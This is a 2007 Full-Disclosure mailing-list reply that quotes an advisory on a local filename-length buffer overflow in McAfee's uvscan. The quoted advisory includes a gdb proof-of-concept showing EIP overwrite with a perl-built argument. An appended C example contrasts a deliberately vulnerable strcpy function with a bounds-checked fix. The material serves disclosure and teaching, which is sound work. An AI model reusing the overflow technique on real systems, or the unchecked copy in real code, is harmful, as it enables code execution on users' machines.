Where does security come into play here? This is a local crash in a non-setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario?
J

P.S. We all know this advisory is bullshit, you should have sold it to WabiSabiLabi LOLOLOL

On Wed, 15 Aug 2007 08:56:54 -0400 Sebastian Wolfgarten <[EMAIL PROTECTED]> wrote:
>I - TITLE
>
>Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local
>Buffer Overflow
>
>II - SUMMARY
>
>Description: Local buffer overflow vulnerability in McAfee Virus Scan
>for Linux and Unix allows arbitrary code execution
>
>Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
>
>Date: August 15th, 2007
>
>Severity: Low-Medium
>
>References: http://www.devtarget.org/mcafee-advisory-08-2007.txt
>
>III - OVERVIEW
>
>McAfee Virus Scan for Linux and Unix is a command-line version of the
>popular McAfee anti-virus scanner running on the Linux operating system
>as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was
>discovered that the product is prone to a classic buffer overflow
>vulnerability when attempting to scan files or directories with a
>particularly long name. This vulnerability results in the local
>execution of arbitrary code with the privileges of the user running the
>scanner; privilege escalation is by default not possible. Remote
>exploitation appears to be infeasible due to file length limitations in
>popular file systems.
>
>IV - DETAILS
>
>The overflow occurs when the product tries to scan a file or directory
>with a name that is longer than a certain size (approx. 4124+ bytes).
>For example, on a Debian Linux 3.1 test system it takes 4124+4 bytes to
>successfully overwrite the EIP register and thus execute arbitrary code:
>
># /usr/local/uvscan/uvscan --version
>Virus Scan for Linux v5.10.0
>Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
>(408) 988-3832 EVALUATION COPY - May 26 2006
>
>Scan engine v5.1.00 for Linux.
>Virus data file v4777 created Jun 05 2006
>Scanning for 194376 viruses, trojans and variants.
>
># gdb /usr/local/uvscan/uvscan
>GNU gdb 6.3-debian
>Copyright 2004 Free Software Foundation, Inc.
>GDB is free software, covered by the GNU General Public License, and you
>are welcome to change it and/or distribute copies of it under certain
>conditions. Type "show copying" to see the conditions. There is
>absolutely no warranty for GDB. Type "show warranty" for details. This
>GDB was configured as "i386-linux"...(no debugging symbols found)
>Using host libthread_db library "/lib/tls/libthread_db.so.1".
>
>(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
>Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 . "B"x4'`
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>[Thread debugging using libthread_db enabled]
>[New Thread 1080238208 (LWP 2461)]
>(no debugging symbols found)
>
>Program received signal SIGSEGV, Segmentation fault.
>[Switching to Thread 1080238208 (LWP 2461)]
>0x42424242 in ?? ()
>(gdb) info registers
>eax            0x1        1
>ecx            0x8068430  134644784
>edx            0x1        1
>ebx            0x41414141 1094795585
>esp            0xbfffdc40 0xbfffdc40
>ebp            0x41414141 0x41414141
>esi            0x41414141 1094795585
>edi            0x41414141 1094795585
>eip            0x42424242 0x42424242
>eflags         0x282      642
>cs             0x73       115
>ss             0x7b       123
>ds             0x7b       123
>es             0x7b       123
>fs             0x0        0
>gs             0x33       51
>
>V - EXPLOIT CODE
>
>An exploit for this vulnerability has been developed but will not be
>released to the general public at this time.
>
>VI - WORKAROUND/FIX
>
>To address this problem, the vendor has released McAfee VirusScan
>Command Line Scanner for Linux and Unix version 5.20. Thus all users of
>the product are asked to test and install this patch as soon as
>possible. McAfee has also published a dedicated security bulletin that
>covers the problem (see
>https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576).
>
>
>VII - DISCLOSURE TIMELINE
>
>18. December 2006 - Notified [EMAIL PROTECTED]
>19. December 2006 - Vendor responded that vulnerability is being
>investigated
>19. December to 15. August 2007 - Weekly vendor report on the progress
>of the development of the patch
>01. August 2007 - Release of patch
>15. August 2007 - Public disclosure

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
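As an added illustration (this is not code from the advisory, from the reply, or from McAfee's product), the C below models the defect class the quoted section IV describes: a fixed-size path buffer filled from a command-line argument with no bounds check, written next to the checked version a scanner should use. The 4096-byte buffer size and all function names are assumptions; the 4124+4 byte input length is the figure the advisory reports. The unsafe function is included only for contrast and is never fed an overlong name here.

```c
/*
 * Added example, not from the advisory or from the vendor's code base.
 * Models the classic stack buffer overflow described in the advisory:
 * an attacker-controlled path copied into a fixed-size buffer without
 * a length check, beside the bounded version that rejects it.
 * PATH_BUF and the function names are hypothetical.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 4096   /* assumed fixed-size on-stack path buffer */

/* VULNERABLE pattern: strcpy() stops only at the NUL terminator, so an
 * argument longer than PATH_BUF - 1 bytes runs past the buffer into the
 * saved registers and return address (the 0x41414141 / 0x42424242 values
 * visible in the quoted gdb session). Kept only for contrast; it is never
 * called with an oversized name in this example. */
int scan_path_unsafe(const char *arg)
{
    char path[PATH_BUF];
    strcpy(path, arg);                 /* no bound: the defect */
    return (int)strlen(path);
}

/* HARDENED pattern: find the terminator within the destination's capacity
 * first, refuse anything that does not fit, then copy with an explicit
 * size. memchr() never reads beyond out_len bytes of the input. */
int scan_path_checked(const char *arg, char *out, size_t out_len)
{
    const char *end = memchr(arg, '\0', out_len);
    if (end == NULL) {
        errno = ENAMETOOLONG;          /* name does not fit with its NUL */
        return -1;
    }
    size_t n = (size_t)(end - arg);
    memcpy(out, arg, n + 1);           /* fits by construction */
    return (int)n;
}

/* Builds a constructed name of the length the advisory used (4124 bytes
 * of 'A' followed by 4 bytes of 'B') and shows the checked path refusing
 * it. Returns the rc of scan_path_checked(): -1 means rejected. */
int demo_reject_long_name(void)
{
    size_t len = 4124 + 4;
    char *name = malloc(len + 1);
    if (name == NULL) return -2;
    memset(name, 'A', 4124);
    memset(name + 4124, 'B', 4);
    name[len] = '\0';

    char path[PATH_BUF];
    int rc = scan_path_checked(name, path, sizeof path);
    free(name);
    return rc;
}

/* Ordinary-length name: the checked copy succeeds and returns its length. */
int demo_accept_short_name(void)
{
    char path[PATH_BUF];
    int rc = scan_path_checked("/tmp/sample.txt", path, sizeof path);
    if (rc < 0 || strcmp(path, "/tmp/sample.txt") != 0) return -1;
    return rc;
}

int main(void)
{
    int longrc = demo_reject_long_name();
    printf("4128-byte name: %s (rc=%d)\n",
           longrc < 0 ? "rejected before scanning" : "accepted", longrc);
    printf("short name:     rc=%d\n", demo_accept_short_name());
    return 0;
}
```

The checked version makes the length decision before any copy happens, which is the property the advisory's scanner lacks: on a name that does not fit, the unsafe path has already corrupted the stack by the time anything could notice.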